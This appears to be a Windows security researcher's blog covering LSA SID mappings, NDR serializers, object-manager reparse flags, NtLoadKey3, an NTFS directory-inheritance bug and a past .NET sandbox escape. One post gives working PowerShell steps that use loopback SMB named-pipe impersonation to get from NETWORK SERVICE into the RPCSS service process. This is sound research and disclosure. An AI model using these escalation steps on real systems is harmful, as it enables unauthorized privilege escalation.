Monday, 26 October 2020

Creating your own Virtual Service Accounts

Following on from the previous blog post, if you can't map arbitrary SIDs to names to make displaying capabilities nicer what is the purpose of LsaManageSidNameMapping? The primary purpose is to facilitate the creation of Virtual Service Accounts

A virtual service account allows you to create an access token where the user SID is a service SID, for example, NT SERVICE\TrustedInstaller. A virtual service account doesn't need to have a password configured which makes them ideal for restricting services rather than having to deal with the default service accounts and using WSH to lock them down or specifying a domain user with password.

To create an access token for a virtual service account you can use LogonUserExEx and specify the undocumented (AFAIK) LOGON32_PROVIDER_VIRTUAL logon provider. You must have SeTcbPrivilege to create the token, and the SID of the account must have its first RID in the range 80 to 111 inclusive. Recall from the previous blog post this is exactly the same range that is covered by LsaManageSidNameMapping.

The LogonUserExEx API only takes strings for the domain and username, you can't specify a SID. Using the LsaManageSidNameMapping function allows you to map a username and domain to a virtual service account SID. LSASS prevents you from using RID 80 (NT SERVICE) and 87 (NT TASK) outside of the SCM or the task scheduler service (see this snippet of reversed LSASS code for how it checks). However everything else in the RID range is fair game.

So let's create out own virtual service account. First you need to add your domain and username using the tool from the previous blog post. All these commands need to be run as a user with SeTcbPrivilege.

SetSidMapping.exe S-1-5-100="AWESOME DOMAIN" 
SetSidMapping.exe S-1-5-100-1="AWESOME DOMAIN\USER"

So we now have the AWESOME DOMAIN\USER account with the SID S-1-5-100-1. Now before we can login the account you need to grant it a logon right. This is normally SeServiceLogonRight if you wanted a service account, but you can specify any logon right you like, even SeInteractiveLogonRight (sadly I don't believe you can actually login with your virtual account, at least easily).

If you get the latest version of NtObjectManager (from github at the time of writing) you can use the Add-NtAccountRight command to add the logon type.

PS> Add-NtAccountRight -Sid 'S-1-5-100-1' -LogonType SeInteractiveLogonRight

Once granted a logon right you can use the Get-NtToken command to logon the account and return a token.

PS> $token = Get-NtToken -Logon -LogonType Interactive -User USER -Domain 'AWESOME DOMAIN' -LogonProvider Virtual
PS> Format-NtToken $token

As you can see we've authenticated the virtual account and got back a token. As we chose to logon as an interactive type the token will also have the INTERACTIVE group assigned. Anyway that's all for now. I guess as there's only a limited number of RIDs available (which is an artificial restriction) MS don't want document these features even though it could be a useful thing for normal developers.

Saturday, 24 October 2020

Using LsaManageSidNameMapping to add a name to a SID.

I was digging into exactly how service SIDs are mapped back to a name when I came across the API LsaLookupManageSidNameMapping. Unsurprisingly this API is not officially documented either on MSDN or in the Windows SDK. However, LsaManageSidNameMapping is documented (mostly). Turns out that after a little digging they lead to the same RPC function in LSASS, just through different names:

LsaLookupManageSidNameMapping -> lsass!LsaLookuprManageCache


LsaManageSidNameMapping -> lsasrv!LsarManageSidNameMapping

They ultimately both end up in lsasrv!LsarManageSidNameMapping. I've no idea why there's two of them and why one is documented but the other not. *shrug*. Of course even though there's an MSDN entry for the function it doesn't seem to actually be documented in the Ntsecapi.h include file *double shrug*. Best documentation I found was this header file.

This got me wondering if I could map all the AppContainer named capabilities via LSASS so that normal applications would resolve them rather than having to do it myself. This would be easier than modifying the SAM or similar tricks. Sadly while you can add some SID to name mappings this API won't let you do that for capability SIDs as there are the following calling restrictions:

  1. The caller needs SeTcbPrivilege (this is a given with an LSA API).
  2. The SID to map must be in the NT security authority (5) and the domain's first RID must be between 80 and 111 inclusive.
  3. You must register a domain SID's name first to use the SID which includes it.
Basically 2 stops us adding a sub-domain SID for a capability as they use the package security authority (15) and we can't just go straight to added the SID to name as we need to have registered the domain with the API, it's not enough that the domain exists. Maybe there's some other easy way to do it, but this isn't it.

Instead I've just put together a .NET tool to add or remove your own SID to name mappings. It's up on github. The mappings are ephemeral so if you break something rebooting should fix it :-)

Wednesday, 1 July 2020

Generating NDR Type Serializers for C#

As part of updating NtApiDotNet to v1.1.28 I added support for Kerberos authentication tokens. To support this I needed to write the parsing code for Tickets. The majority of the Kerberos protocol uses ASN.1 encoding, however some Microsoft specific parts such as the Privileged Attribute Certificate (PAC) uses Network Data Representation (NDR). This is due to these parts of the protocol being derived from the older NetLogon protocol which uses MSRPC, which in turn uses NDR.

I needed to implement code to parse the NDR stream and return the structured information. As I already had a class to handle NDR I could manually write the C# parser but that'd take some time and it'd have to be carefully written to handle all use cases. It'd be much easier if I could just use my existing NDR byte code parser to extract the structure information from the KERBEROS DLL. I'd fortunately already written the feature, but it can be non-obvious how to use it. Therefore this blog post gives you an overview of how to extract NDR structure data from existing DLLs and create standalone C# type serializer.

First up, how does KERBEROS parse the NDR structure? It could have manual implementations, but it turns out that one of the lesser known features of the MSRPC runtime on Windows is its ability to generate standalone structure and procedure serializers without needing to use an RPC channel. In the documentation this is referred to as Serialization Services.

To implement a Type Serializer you need to do the following in a C/C++ project. First, add the types to serialize inside an IDL file. For example the following defines a simple type to serialize.

interface TypeEncoders
    typedef struct _TEST_TYPE
        [unique, string] wchar_t* Name;
        DWORD Value;
    } TEST_TYPE;

You then need to create a separate ACF file with the same name as the IDL file (i.e. if you have TYPES.IDL create a file TYPES.ACF) and add the encode and decode attributes.

interface TypeEncoders
    typedef [encode, decode] TEST_TYPE;

Compiling the IDL file using MIDL you'll get the client source code (such as TYPES_c.c), and you should find a few functions, the most important being TEST_TYPE_Encode and TEST_TYPE_Decode which serialize (encode) and deserialize (decode) a type from a byte stream. How you use these functions is not really important. We're more interested in understanding how the NDR byte code is configured to perform the serialization so that we can parse it and generate our own serializers. 

If you look at the Decode function when compiled for a X64 target it should look like the following:

    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,

The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

The API takes 6 parameters:
  1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
  2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
  3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
  4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
  5. The index of the type offset in the 4th parameter.
  6. A pointer to the structure to serialize or deserialize.

Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

mov     [rsp+28h], r14  ; pObject
mov     dword ptr [rsp+20h], 5 ; nTypeIndex
lea     r9, off_1800F3138 ; ArrTypeOffset
lea     r8, stru_1800D5EA0 ; pProxyInfo
lea     rdx, stru_1800DEAF0 ; pPicklingInfo
mov     rcx, [rsp+68h]  ; Handle
call    NdrMesTypeDecode3

From this we can extract the following values:

Type Offset Array = 0x1800F3138
Type Offset Index = 5

These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

PS> $lib = Import-Win32Module KERBEROS.DLL
PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
     -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

PS> Format-RpcComplexType $types -Pointer

This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

interface RpcServer
    int Test([in] handle_t hBinding, 
             [unique] PPAC_DEVICE_INFO device_info);

Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

#pragma comment(lib, "rpcrt4.lib")

extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
    return new char[size];

extern "C" void __RPC_USER MIDL_user_free(void* p) {
    delete[] p;

int Test(
    handle_t hBinding,
    PPAC_DEVICE_INFO device_info) {
    printf("Test %p\n", device_info);
    return 0;

Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

Now parse the RPC server using Get-RpcServer and format the complex types.

PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

    handle_t _MidlEsHandle,
    TEST_TYPE * _pType)
         ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
         ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
  1. The serialization handle.
  2. The MIDL_TYPE_PICKLING_INFO structure.
  3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
  4. A pointer into the format string for the start of the type.
  5. A pointer to the structure to serialize or deserialize.
Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

PS> Get-NdrComplexType -PicklingInfo 0x1234 `
    -StubDesc 0x2345 -TypeOffset 2 -Module $lib

Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

Saturday, 23 May 2020

OBJ_DONT_REPARSE is (mostly) Useless.

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath

Oh well...

Friday, 22 May 2020

Silent Exploit Mitigations for the 1%

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Wednesday, 20 May 2020

Writing Windows File System Drivers is Hard.

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ

Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.

Thursday, 7 May 2020

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.

Saturday, 25 April 2020

Sharing a Logon Session a Little Too Much

The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

Wednesday, 1 April 2020

Taking a joke a little too far.

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Sunday, 9 February 2020

Getting an Interactive Service Account Shell

Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

